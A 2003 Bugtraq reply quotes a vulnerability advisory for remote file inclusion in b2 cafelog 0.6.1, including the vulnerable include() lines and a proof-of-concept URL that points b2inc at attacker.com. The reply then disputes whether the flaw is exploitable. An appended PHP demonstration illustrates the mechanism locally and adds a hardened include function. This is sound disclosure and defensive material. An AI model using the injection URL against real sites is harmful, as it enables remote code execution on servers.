Message-ID: <3ED6FB98.6070101@zed1.com>
Date: Fri, 30 May 2003 07:35:04 +0100
From: mike little <mike@...1.com>
To: bugtraq@...urityfocus.com
Subject: Re: b2 cafelog 0.6.1 remote command execution.


pokleyzz wrote:
> Products: b2 cafelog 0.6.1 (http://cafelog.com/)
> Date: 29 May 2003
> Author: pokleyzz <pokleyzz_at_scan-associates.net>
> Contributors: sk_at_scan-associates.net
>                shaharil_at_scan-associates.net
>                munir_at_scan-associates.net
> URL: http://www.scan-associates.net
> 
> Summary:  b2 cafelog 0.6.1 remote command execution.
> 
> Description
> ===========
> b2 cafelog is a blogger system written in php with mysql as database backend.
> 
> Details
> =======
> b2 cafelog 0.6.1 comes with a directory b2-tools.  This directory contains 2
> php scripts (blogger-2-b2.php and gm-2-b2.php) which allow a user to specify
> $b2inc and do remote code injection.
> 
> from blogger-2-b2.php line 21 
> -----------------------------------------------------
> case "step1":
> 
>    include("b2config.php");
>    include("$b2inc/b2functions.php");
>    include("$b2inc/b2vars.php");
> ------------------------------------------------------------------------------------ 
> 
> 
> from gm-2-b2.php line 5 
> ----------------------------------------------------------
> // 3. load in the browser from there
> 
> include("b2config.php");
> include($b2inc."/b2functions.php");
> ----------------------------------------------------------------------------------- 
> 
> 
> Proof of concept
> ===========
> http://blabla.com/b2-tools/gm-2-b2.php?b2inc=http://attacker.com
> attacker.com has a file named b2functions.php containing the php script you
> want to execute.
> 
> Workaround
> =========
> Remove b2-tools directory.
> 
> Vendor Response
> ===============
> Vendor has been contacted on 19/05/2003 but no reply given.
> 
> 

Firstly, the issue has been addressed 
http://tidakada.com/board/viewtopic.php?t=3212
and a new version issued
http://tidakada.com/board/viewtopic.php?t=3234


Secondly, has anyone tried this? The fact is that b2config.php defines 
$b2inc with no test beforehand. So, whilst for the duration of the 
parsing of b2config.php $b2inc could indeed be set to some value from 
the outside world, it is immediately overwritten, with no check, by the 
value set by the user (or left from the default installation).
In order to effectively use the setting of b2inc for malicious purposes 
you would have to have enough access to edit b2config.php.


Mike
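The mechanism the advisory describes, together with the include-ordering point raised in the reply above, as an added example that is not code from b2 cafelog, from the advisory, or from the reply. It assumes PHP 7 or later on the command line and writes every file it touches into a temp directory; the host attacker.example, the directory names and the stand-in b2config.php are constructed for the demo. Case 1 is the situation the reply describes (the config is found and its unconditional assignment clobbers the injected value); case 2 shows what PHP does when the config include fails; the last part is a hardened form that fixes the include directory and refuses anything that resolves outside it.

```php
<?php
// Added example, not code from b2 cafelog, the advisory, or the reply.
// Assumptions: PHP 7+ CLI and a writable temp dir; every file below is a
// constructed stand-in written by this script. No network access happens.

// --- setup: constructed stand-ins for b2's files ------------------------------
$work = sys_get_temp_dir() . '/b2inc-demo';
@mkdir("$work/b2-inc", 0700, true);
file_put_contents("$work/b2-inc/b2functions.php",
    "<?php echo \"  loaded the real b2functions.php\\n\";\n");
// Like b2config.php as the reply describes it: assigns $b2inc
// unconditionally, with no isset() guard.
file_put_contents("$work/b2config.php",
    "<?php \$b2inc = '$work/b2-inc';\n");

// --- the attacker's input --------------------------------------------------------
// Constructed request matching the advisory's proof of concept. With
// register_globals=On (the PHP 4 default) ?b2inc=... became the global $b2inc
// before the first line of the script ran; the explicit assignments below
// stand in for that.
$_GET = ['b2inc' => 'http://attacker.example'];

// Case 1: include of b2config.php succeeds. Its unconditional assignment
// clobbers the injected value, which is the point of the reply.
echo "case 1: b2config.php is found\n";
$b2inc = $_GET['b2inc'];
include "$work/b2config.php";
echo "  \$b2inc is now: $b2inc\n";
include "$b2inc/b2functions.php";          // loads the local, legitimate file

// Case 2: include of b2config.php fails, e.g. the script in b2-tools/ asks
// for a b2config.php that is not on its include path. include() only emits
// a warning for a missing file and carries on, so the injected value
// survives into the very next include().
echo "case 2: b2config.php is not found\n";
$b2inc = $_GET['b2inc'];
@include "$work/b2-tools/b2config.php";    // no such file; warning silenced for the demo
echo "  \$b2inc is still: $b2inc\n";
echo "  next include would target: $b2inc/b2functions.php\n";
// Deliberately not executed: with allow_url_fopen=On, PHP 4 fetches and runs it.

// --- hardened form ----------------------------------------------------------------
// Never let request data choose an include path. Fix the directory relative
// to the script and refuse any name that resolves outside it.
function safeInclude(string $base, string $name): bool
{
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($baseReal === false || $target === false
        || strncmp($target, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        return false;                      // missing, a URL, or escaped the allowed directory
    }
    include $target;
    return true;
}

echo "hardened: \$b2inc from the request is never consulted\n";
define('B2INC', "$work/b2-inc");           // in b2 this would be __DIR__ . '/../b2-inc'
var_dump(safeInclude(B2INC, 'b2functions.php'));                    // legitimate file
var_dump(safeInclude(B2INC, '../../../etc/passwd'));                // traversal attempt, refused
var_dump(safeInclude(B2INC, $_GET['b2inc'] . '/b2functions.php'));  // URL, not a local file, refused
```

Run it with `php` from any directory. Whether a real deployment behaves like case 1 or case 2 depends only on whether `include("b2config.php")` actually finds the file from the include path of the script in b2-tools/, which is the thing to verify before relying on the overwrite; the hardened form does not depend on that at all, because the request variable never reaches `include()`.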




